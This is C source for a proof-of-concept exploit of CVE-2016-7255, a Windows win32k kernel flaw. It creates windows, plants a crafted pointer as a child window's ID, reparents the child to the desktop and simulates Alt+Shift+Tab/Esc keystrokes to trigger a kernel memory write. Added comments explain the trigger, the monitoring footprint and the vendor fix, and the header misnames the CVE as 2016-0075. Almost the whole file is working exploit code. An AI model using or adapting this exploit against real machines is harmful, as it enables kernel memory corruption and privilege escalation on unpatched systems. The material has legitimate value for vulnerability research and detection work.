
/*
Source: https://github.com/tinysec/public/tree/master/CVE-2016-7255

Full Proof of Concept:

https://github.com/tinysec/public/tree/master/CVE-2016-7255
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40745.zip

********************************************************************
Created: 2016-11-09 14:23:09
Filename: main.c
Author: root[at]TinySec.net
Version 0.0.0.1
Purpose: poc of cve-2016-0075
*********************************************************************
*/
|
|
|
|
#include <windows.h>
|
|
#include <wchar.h>
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
|
|
|
|
//////////////////////////////////////////////////////////////////////////
|
|
#pragma comment(lib,"ntdll.lib")
|
|
#pragma comment(lib,"user32.lib")
|
|
|
|
/* Drop any SDK definition of the DbgPrint name so the wrapper defined below
 * can own it for this translation unit. */
#undef DbgPrint

/* ntdll export used by the DbgPrint wrapper below; resolved through the
 * ntdll.lib pragma above.  Presumably mirrors the driver-kit declaration
 * (ComponentId, Level, printf-style Format) — confirm against the DDK. */
ULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );
|
|
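/*
 * Format a message and send it both to the kernel debugger output
 * (ntdll DbgPrintEx) and to any attached user-mode debugger
 * (OutputDebugStringA).  This replaces the SDK DbgPrint name, which the
 * file #undef's above, for this translation unit.
 *
 * Format: printf-style format string; the variadic arguments follow it.
 *         Output is truncated to 1023 characters.
 * Returns: always 0 (the status of the ntdll call is not propagated).
 */
ULONG __cdecl DbgPrint(__in char* Format, ...)
{
    enum { DBG_BUFF_CCH = 1024 };
    CHAR* pszDbgBuff = NULL;
    va_list VaList;

    /* HEAP_ZERO_MEMORY gives the same zero-filled buffer the original
     * produced with a separate RtlZeroMemory call. */
    pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
                                  DBG_BUFF_CCH * sizeof(CHAR));
    if (NULL == pszDbgBuff)
    {
        return 0;
    }

    va_start(VaList, Format);
    /* _vsnprintf does not guarantee NUL termination when it truncates; the
     * buffer is pre-zeroed and the last byte is reserved, so the result is
     * always a terminated string. */
    _vsnprintf(pszDbgBuff, DBG_BUFF_CCH - 1, Format, VaList);
    va_end(VaList);

    /* The already-formatted text is passed through a fixed "%s" format.
     * The original handed pszDbgBuff to DbgPrintEx as its Format argument,
     * so any '%' sequence that arrived via the caller's arguments would
     * have been re-interpreted as a conversion (format-string defect).
     * 77 is DPFLTR_IHVDRIVER_ID; level 0 matches the original. */
    DbgPrintEx(77, 0, "%s", pszDbgBuff);
    OutputDebugStringA(pszDbgBuff);

    HeapFree(GetProcessHeap(), 0, pszDbgBuff);
    pszDbgBuff = NULL;

    return 0;
}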
|
|
|
|
|
|
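/*
 * Synthesize a key-press (key-down) event for one virtual-key code via
 * SendInput.
 *
 * wKey: a VK_* virtual-key code.
 * Returns: 0 when SendInput reports the one event as inserted, -1 when it
 *          inserted nothing (the original ignored SendInput's result and
 *          always returned 0; existing callers do not check the value).
 *
 * Note: a file-scope identifier starting with an underscore sits in the
 * implementation's reserved namespace; the name is kept for the callers
 * in this file.
 */
int _sim_key_down(WORD wKey)
{
    INPUT stInput = {0};
    UINT uInserted = 0;

    stInput.type = INPUT_KEYBOARD;
    stInput.ki.wVk = wKey;
    stInput.ki.dwFlags = 0;   /* 0 = press; the release variant sets KEYEVENTF_KEYUP */

    uInserted = SendInput(1, &stInput, sizeof(stInput));

    return (1 == uInserted) ? 0 : -1;
}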
|
|
|
|
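/*
 * Synthesize a key-release (key-up) event for one virtual-key code via
 * SendInput.  Mirror of _sim_key_down with KEYEVENTF_KEYUP set.
 *
 * wKey: a VK_* virtual-key code.
 * Returns: 0 when SendInput reports the one event as inserted, -1 when it
 *          inserted nothing (the original ignored SendInput's result and
 *          always returned 0; existing callers do not check the value).
 */
int _sim_key_up(WORD wKey)
{
    INPUT stInput = {0};
    UINT uInserted = 0;

    stInput.type = INPUT_KEYBOARD;
    stInput.ki.wVk = wKey;
    stInput.ki.dwFlags = KEYEVENTF_KEYUP;

    uInserted = SendInput(1, &stInput, sizeof(stInput));

    return (1 == uInserted) ? 0 : -1;
}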
|
|
|
|
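/*
 * Send the Alt+Shift+Esc chord: hold Alt and Shift, tap Escape twice,
 * then release the modifiers.  Failures of the individual SendInput calls
 * are not checked, as in the original.
 *
 * Returns: always 0.
 *
 * Cleanup versus the original: the unused local `i` and the single-pass
 * do { } while (FALSE) wrapper (which contained no break) are removed.
 */
int _sim_alt_shift_esc()
{
    _sim_key_down(VK_MENU);
    _sim_key_down(VK_SHIFT);

    /* Two Escape taps while the modifiers are held. */
    _sim_key_down(VK_ESCAPE);
    _sim_key_up(VK_ESCAPE);

    _sim_key_down(VK_ESCAPE);
    _sim_key_up(VK_ESCAPE);

    _sim_key_up(VK_MENU);
    _sim_key_up(VK_SHIFT);

    return 0;
}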
|
|
|
|
|
|
|
|
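/*
 * Send the Alt+Shift+Tab chord: hold Alt and Shift, tap Tab nCount times
 * with a one-second pause after each tap, then release the modifiers.
 *
 * nCount: number of Tab taps; for nCount <= 0 only the modifiers are
 *         pressed and released.
 * Returns: 0 once the sequence has been sent.  The original initialised
 *          nFinalRet to -1 and never updated it, so it reported failure on
 *          every call; the only caller in this file ignores the value.
 *
 * Also removed: the unused local `hWnd` and the single-pass
 * do { } while (FALSE) wrapper, which contained no break.
 */
int _sim_alt_shift_tab(int nCount)
{
    int nIdx = 0;

    _sim_key_down(VK_MENU);
    _sim_key_down(VK_SHIFT);

    for (nIdx = 0; nIdx < nCount; nIdx++)
    {
        _sim_key_down(VK_TAB);
        _sim_key_up(VK_TAB);

        /* Presumably lets the window switcher settle between taps. */
        Sleep(1000);
    }

    _sim_key_up(VK_MENU);
    _sim_key_up(VK_SHIFT);

    return 0;
}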
|
|
|
|
|
|
|
|
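/*
 * Trigger routine of this CVE-2016-7255 proof of concept.
 *
 * It registers a window class, creates a parent window and a child window,
 * stores (pAddress - 0x28 on x64 / - 0x14 on x86) as the child's window ID
 * via SetWindowLongPtr(GWLP_ID), reparents the child to the desktop and
 * drives the Alt+Shift+Tab / Alt+Shift+Esc switcher sequences.  From the
 * function name the intended kernel-side effect is a 4-byte OR at
 * pAddress; that behaviour lives in win32k and is not visible in this
 * file, and the offsets are the PoC author's values — confirm against the
 * referenced repository.  On an unpatched system this is expected to
 * corrupt kernel memory or crash the machine; the mitigation is the vendor
 * fix for CVE-2016-7255.  From a monitoring standpoint the user-mode
 * footprint is a process setting a pointer-sized GWLP_ID on a child
 * window and then reparenting it to the desktop.
 *
 * pAddress: address the PoC targets (wmain passes a fixed sentinel).
 * Returns: always 0, also when class registration or window creation
 *          fails (those paths simply skip the trigger).
 *
 * Changes from the original: the message loop now stops on GetMessage's
 * -1 error return (while (GetMessage(...)) treated -1 as true and spun);
 * UnregisterClassW is only called when registration succeeded; the child
 * is destroyed before the parent; the string-literal pointers are const.
 */
int or_address_value_4(__in void* pAddress)
{
    WNDCLASSEXW stWC = {0};
    HWND hWndParent = NULL;
    HWND hWndChild = NULL;
    const WCHAR* pszClassName = L"cve-2016-7255";
    const WCHAR* pszTitleName = L"cve-2016-7255";
    void* pId = NULL;
    MSG stMsg = {0};
    BOOL bClassRegistered = FALSE;
    BOOL bMsgRet = FALSE;
    HINSTANCE hInst = GetModuleHandleW(NULL);

    do
    {
        stWC.cbSize = sizeof(stWC);
        stWC.lpfnWndProc = DefWindowProcW;
        stWC.lpszClassName = pszClassName;
        /* stWC.hInstance stays NULL as in the original, while the windows
         * and UnregisterClassW use the module handle — kept as written. */

        if (0 == RegisterClassExW(&stWC))
        {
            break;
        }
        bClassRegistered = TRUE;

        hWndParent = CreateWindowExW(0, pszClassName, NULL,
                                     WS_OVERLAPPEDWINDOW | WS_VISIBLE,
                                     0, 0, 360, 360,
                                     NULL, NULL, hInst, NULL);
        if (NULL == hWndParent)
        {
            break;
        }

        hWndChild = CreateWindowExW(0, pszClassName, pszTitleName,
                                    WS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,
                                    0, 0, 160, 160,
                                    hWndParent, NULL, hInst, NULL);
        if (NULL == hWndChild)
        {
            break;
        }

        /* PoC-specific adjustment of the target address; see header. */
#ifdef _WIN64
        pId = ((UCHAR*)pAddress - 0x28);
#else
        pId = ((UCHAR*)pAddress - 0x14);
#endif /* _WIN64 */

        /* The vulnerable operation: a pointer-sized value stored as the
         * child's window ID. */
        SetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);

        DbgPrint("hWndChild = 0x%p\n", hWndChild);

        /* With no debugger attached this breakpoint is typically an
         * unhandled exception that ends the process before the steps
         * below run; kept as the author wrote it. */
        DebugBreak();

        ShowWindow(hWndParent, SW_SHOWNORMAL);
        SetParent(hWndChild, GetDesktopWindow());
        SetForegroundWindow(hWndChild);

        _sim_alt_shift_tab(4);
        SwitchToThisWindow(hWndChild, TRUE);
        _sim_alt_shift_esc();

        /* GetMessage returns 0 on WM_QUIT and -1 on error; only a positive
         * result carries a message to dispatch. */
        while ((bMsgRet = GetMessage(&stMsg, NULL, 0, 0)) != 0)
        {
            if (-1 == bMsgRet)
            {
                break;
            }
            TranslateMessage(&stMsg);
            DispatchMessage(&stMsg);
        }
    } while (FALSE);

    /* Destroy the child first: if SetParent was never reached it is still
     * owned by the parent, and destroying the parent first would leave a
     * dead handle for the second call. */
    if (NULL != hWndChild)
    {
        DestroyWindow(hWndChild);
        hWndChild = NULL;
    }

    if (NULL != hWndParent)
    {
        DestroyWindow(hWndParent);
        hWndParent = NULL;
    }

    if (bClassRegistered)
    {
        UnregisterClassW(pszClassName, hInst);
    }

    return 0;
}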
|
|
|
|
/*
 * Program entry point: runs the PoC trigger once against a fixed sentinel
 * address.  The command-line arguments are not used.
 *
 * Returns: 0.
 */
int __cdecl wmain(int nArgc, WCHAR** Argv)
{
    (void)nArgc;
    (void)Argv;

    or_address_value_4((void*)0xFFFFFFFF);

    return 0;
}